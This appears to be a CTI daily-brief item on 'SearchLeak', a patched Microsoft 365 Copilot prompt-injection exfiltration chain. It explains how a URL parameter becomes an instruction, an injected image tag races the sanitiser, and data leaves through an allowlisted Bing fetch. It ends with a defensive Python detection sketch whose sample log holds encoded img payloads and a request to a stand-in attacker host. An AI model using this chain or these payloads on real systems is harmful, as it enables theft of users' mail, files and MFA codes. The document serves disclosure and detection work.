Varonis "SearchLeak" (CVE-2026-42824): one-click M365 Copilot data exfiltration, now patched
From CTI Daily Brief — 2026-06-16 · published 2026-06-16
Varonis Threat Labs disclosed SearchLeak, a three-stage chain in Microsoft 365 Copilot Enterprise Search that Microsoft patched server-side as CVE-2026-42824 (command-injection / information-disclosure, NVD CVSS 6.5) (Varonis, 2026-06-15; Microsoft MSRC). Stage 1: the q URL parameter is passed to Copilot as an executable instruction rather than a sanitised query (parameter-to-prompt injection). Stage 2: an injected <img> tag fires during a streaming-render race before the output sanitiser runs. Stage 3: the exfiltration request is relayed through Bing's server-side image-search fetch — *.bing.com is allowlisted in Copilot's CSP — bypassing the browser CSP and carrying mailbox content, calendar entries, SharePoint/OneDrive files and emailed MFA/OTP codes to an attacker domain, all from a single click on a genuine microsoft.com link (The Hacker News, 2026-06-15). No customer action is required for patched tenants and no in-the-wild exploitation was observed. Mapped to T1566.002 and T1071.001.
Why it matters to us: M365 Copilot Enterprise is in active Swiss-federal and EU public-sector rollouts. The vulnerability class — prompt injection via URL parameter, streaming-render race, and SSRF-relay CSP bypass — will recur in other AI-augmented enterprise apps; build CASB/DLP detection for Copilot search URLs carrying HTML-encoded payloads in the q parameter and for Copilot sessions fetching to non-Microsoft domains.
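As an added detection sketch (not code from Varonis, Microsoft or the sources cited above): a Python triage over constructed Copilot-session egress log lines that flags q parameters carrying HTML markup under one or more layers of URL/entity encoding, and fetches to hosts outside a first-party suffix list. The Copilot search host name, the suffix allowlist and the log-line format are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumptions: the host a tenant proxy tags as Copilot search, and the
# first-party suffixes treated as expected Copilot egress.
COPILOT_SEARCH_HOSTS = {"copilot.microsoft.com"}
MICROSOFT_SUFFIXES = (".microsoft.com", ".bing.com", ".office.com", ".cloud.microsoft", ".sharepoint.com")
# Tag name must follow '<' directly, so "budget < last year" is not a tag.
HTML_TAG = re.compile(r"</?[a-zA-Z][a-zA-Z0-9-]*(\s[^>]*)?>")

def decode_layers(value, rounds=3):
    """Peel up to `rounds` layers of URL/entity encoding: %3Cimg, %253Cimg, &lt;img -> <img."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value

def q_param_has_markup(url):
    """Copilot search URL whose decoded q parameter contains an HTML tag."""
    parts = urlsplit(url)
    if parts.hostname not in COPILOT_SEARCH_HOSTS:
        return False
    return any(HTML_TAG.search(decode_layers(q)) for q in parse_qs(parts.query).get("q", []))

def is_non_microsoft_egress(url):
    """Destination host is outside the first-party suffix list."""
    host = (urlsplit(url).hostname or "").lower()
    return not any(host == s[1:] or host.endswith(s) for s in MICROSOFT_SUFFIXES)

def triage(log_lines):
    """Lines are '<copilot-session-id> <url>' (constructed format); returns (session, reason) alerts."""
    alerts = []
    for line in log_lines:
        session, url = line.split(" ", 1)
        if q_param_has_markup(url):
            alerts.append((session, "html-in-q"))
        if is_non_microsoft_egress(url):
            alerts.append((session, "non-microsoft-egress"))
    return alerts

SAMPLE_LOG = [  # constructed: egress recorded for five Copilot sessions
    "s1 https://copilot.microsoft.com/search?q=quarterly%20budget%20%3C%20last%20year",
    "s2 https://copilot.microsoft.com/search?q=%3Cimg%20src%3D%22https%3A%2F%2Fattacker.example%2Fp%22%3E",
    "s3 https://copilot.microsoft.com/search?q=%2526lt%253Bimg%2520src%253D%2522x%2522%2526gt%253B",
    "s4 https://www.bing.com/images/search?q=cat",
    "s5 https://attacker.example/collect?d=PLACEHOLDER",
]
```

Fed from CASB or proxy URL logs, the two checks map onto the two detections recommended above; the suffix allowlist will need tuning per tenant, since legitimate Copilot connectors may fetch non-Microsoft hosts.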